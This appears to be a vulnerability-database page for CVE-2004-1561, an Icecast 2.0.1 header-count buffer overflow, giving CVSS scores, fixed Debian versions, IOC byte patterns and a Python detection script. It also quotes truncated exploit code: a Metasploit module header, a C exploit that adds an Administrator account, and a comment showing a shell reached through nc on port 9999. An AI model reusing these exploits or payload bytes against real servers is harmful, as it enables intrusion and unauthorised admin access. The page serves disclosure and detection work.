CVE-2004-1561
Published: 2004-12-31
CVE-2004-1561: Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Priority: P2 · 64 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 78.27% (99.5th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | icecast2 | < icecast2 2.0.2.debian-1 (bookworm) | icecast2 2.0.2.debian-1 (bookworm) |
| icecast | icecast | — | — |
| icecast | icecast | — | — |
Detection & IOCs (extracted from sources)
bytes: \xeb\x0c / HTTP/1.1 <payload>\r\n + 'Accept: text/html\r\n' * 31 + \xff\x64\x24\x04\r\n
bytes: \xeb\x0c (jmp 12) followed by \xff\x64\x24\x04 (jmp [esp+4])
- Trigger condition is exactly 32 HTTP headers in a single request; the 32nd header overwrites the saved instruction pointer (one past end of pointer array).
- Exploit payload bad characters are \x0d, \x0a, and \x00 (CR, LF, NULL). These bytes cannot appear in the HTTP header payload; detection signatures should account for alphanumeric-encoded shellcode.
- The exploit uses ExitThread() rather than ExitProcess(); a successfully exploited Icecast process will show a permanently elevated thread counter (threadpool never decremented). Monitor for threadpool exhaustion on port 8000.
- The Metasploit module uses EXITFUNC=thread; look for shellcode with a stack adjustment of -3500 bytes (\x81\xec) as a payload artifact in HTTP request bodies to port 8000.
- Exploit targets Icecast versions 2.0.1 and earlier on Windows x86; Linux builds are generally not exploitable due to stack layout differences.
- The vulnerability is only reliably exploitable on Win32 builds of Icecast 2.0.1 and earlier; Linux builds are not considered exploitable due to differing compiler stack layouts.
- Multi-hitting the exploit is possible but will progressively exhaust the Icecast threadpool; each successful payload exit permanently increments the thread counter.
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
osv · 7.5 HIGH
vendor_debian · 7.5 HIGH
GHSA
GHSA-jgqq-gwfm-cchw: Buffer overflow in Icecast 2
ghsa_unreviewed·2022-04-29
CVE-2004-1561 [HIGH] GHSA-jgqq-gwfm-cchw: Buffer overflow in Icecast 2
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
OSV
CVE-2004-1561: Buffer overflow in Icecast 2
osv·2004-12-31·CVSS 7.5
CVE-2004-1561 [HIGH] CVE-2004-1561: Buffer overflow in Icecast 2
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Debian
CVE-2004-1561: icecast2 - Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute ...
vendor_debian·2004·CVSS 7.5
CVE-2004-1561 [HIGH] CVE-2004-1561: icecast2 - Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute ...
Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.
Scope: local
bookworm: resolved (fixed in 2.0.2.debian-1)
bullseye: resolved (fixed in 2.0.2.debian-1)
forky: resolved (fixed in 2.0.2.debian-1)
sid: resolved (fixed in 2.0.2.debian-1)
trixie: resolved (fixed in 2.0.2.debian-1)
No detection rules found.
Exploit-DB
Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
exploitdb·2010-04-30
---
##
# $Id: icecast_header.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Icecast ( %q{
This module exploits a buffer overflow in the header parsing
of icecast, discovered by Luigi Auriemma. Sending 32 HTTP
headers will cause a write one past the end of a pointer
array. On win32 this happens to overwrite the saved
instruction pointer, and on linux (depending on compiler,
etc) this seems to generally overwrite nothing crucial (read
not exploit
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (2)
exploitdb·2004-10-12
---
/*
ICECAST 2.0.1 WiN32 REMOTE EXPLOiT
by Luigi Auriemma
Modded by:
******* LORDKAOZ *********
*** OF IMPERATORI TEAM ***
Greetz to marc0z, m3nTe, DarKBad, OuT, FaX (even though he doesn't deserve it), MeSSiA and eXpLoIt!
This exploit will add an Administrator account with USER: X AND PASSWORD: X
*/
#include
#include
#include
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ 2048
#define TIMEOUT 3
#define EXEC "GET / HTTP/1.0\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n"
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
exploitdb·2004-10-06
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:\>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ 2048
#define TIMEOUT 3
#define EXEC "GET / HTTP/1.0\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a
Metasploit
Icecast Header Overwrite
metasploit
This module exploits a buffer overflow in the header parsing of icecast versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved instruction pointer, and on linux (depending on compiler, etc) this seems to generally overwrite nothing crucial (read not exploitable). This exploit uses ExitThread(), this will leave icecast thinking the thread is still in use, and the thread counter won't be decremented. This means for each time your payload exits, the counter will be left incremented, and eventually the threadpool limit will be maxed. So you can multihit, but only till you fill the threadpool.
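A defender-side check built from the trigger condition described above, as an added example that is not part of the original page or of the Metasploit module: it counts header lines in a raw request and flags the 32-line threshold and the byte marker listed under Detection & IOCs. The function name, finding labels and sample requests are constructed for illustration.

```python
import re

# Values taken from the page: the write goes one past the pointer array on the
# 32nd header line, and \xff\x64\x24\x04 is a byte marker in its IOC list.
HEADER_LIMIT = 32
IOC_BYTES = b"\xff\x64\x24\x04"


def inspect_request(raw: bytes) -> dict:
    """Count header lines in a raw HTTP request head and list findings.

    Hypothetical helper: 'raw' is the reassembled client-to-server byte
    stream for one request, e.g. from a proxy log or a packet capture.
    """
    # The head ends at the first blank line; tolerate bare LF line endings
    # and requests that never send the terminating blank line.
    end = re.search(rb"\r?\n\r?\n", raw)
    head = raw[:end.start()] if end else raw.rstrip(b"\r\n")
    lines = re.split(rb"\r?\n", head)
    request_line, headers = lines[0], lines[1:]

    findings = []
    # Count every line, not only "Name: value" pairs: the C proof of concept
    # on this page sends bare "a" lines, which are still counted as headers.
    if len(headers) >= HEADER_LIMIT:
        findings.append("header-count")
    if IOC_BYTES in head:
        findings.append("ioc-bytes")
    return {"request_line": request_line,
            "headers": len(headers),
            "findings": findings}


# Constructed sample inputs (not captured traffic).
BENIGN = (b"GET /stream.ogg HTTP/1.1\r\nHost: radio.example\r\n"
          b"User-Agent: player/1.0\r\nAccept: */*\r\n\r\n")
JUST_UNDER = b"GET / HTTP/1.1\r\n" + b"Accept: text/html\r\n" * 31 + b"\r\n"
AT_LIMIT = b"GET / HTTP/1.1\r\n" + b"Accept: text/html\r\n" * 32 + b"\r\n"
UNTERMINATED = b"GET / HTTP/1.0\n" + b"a\n" * 32  # bare LF, no blank line
MARKER = b"GET / HTTP/1.1\r\nHost: x\r\nX-Test: \xff\x64\x24\x04\r\n\r\n"

if __name__ == "__main__":
    samples = {"benign": BENIGN, "just_under": JUST_UNDER,
               "at_limit": AT_LIMIT, "unterminated": UNTERMINATED,
               "marker": MARKER}
    for name, req in samples.items():
        result = inspect_request(req)
        print(name, result["headers"], result["findings"])
```

A header-count hit on its own is a lead to correlate with the Icecast version and platform behind port 8000, since the page states only Win32 builds of 2.0.1 and earlier are reliably exploitable.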
No writeups or analysis indexed.
References
http://aluigi.altervista.org/adv/iceexec-adv.txt
http://marc.info/?l=bugtraq&m=109640005127644&w=2
http://marc.info/?l=bugtraq&m=109674593230539&w=2
http://secunia.com/advisories/12666/
http://securitytracker.com/id?1011439
http://www.osvdb.org/10446
http://www.securiteam.com/exploits/6X00315BFM.html
http://www.securityfocus.com/bid/11271
https://exchange.xforce.ibmcloud.com/vulnerabilities/17538